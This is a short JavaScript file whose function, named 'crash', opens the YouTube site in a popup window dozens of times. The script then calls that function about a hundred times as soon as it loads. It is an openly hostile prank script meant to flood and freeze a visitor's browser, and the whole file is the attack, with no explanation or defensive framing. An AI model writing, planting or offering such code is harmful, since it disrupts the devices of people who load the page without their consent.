
function crash(){
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");

window.open("https://Youtube.com", "Crash");window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");

window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash");
window.open("https://Youtube.com", "Crash"); 
}
crash()
crash()
crash()
  crash()

  crash()
  crash()
  crash()
  crash()

            crash()
  crash()
  crash()

  crash()
  crash()
  crash()
  crash()

  crash()
  crash()
  crash()

  crash()
  crash()
  crash()

  crash()
  crash()
  crash()
  crash()
  crash()

  crash()
  crash()
  crash()
  crash()
  crash()

  crash()
  crash()
  crash()
  crash()
  crash()
  crash()
  crash()

  crash()
  crash()
  crash()
  crash()

  crash()
  crash()
  crash()
  crash()

  crash()
  crash()
  crash()
  crash()
  crash()
  crash()
  crash()
  crash()crash()crash()
  crash()

  crash()
  crash()
  crash()

  crash()

  crash()crash()

  crash()

  crash()
  crash()

  crash()
  crash()

  crash()


  crash()
  crash()

  crash()
  crash()

  crash()
  crash()
  crash()
  crash()

  crash()
  crash()
  

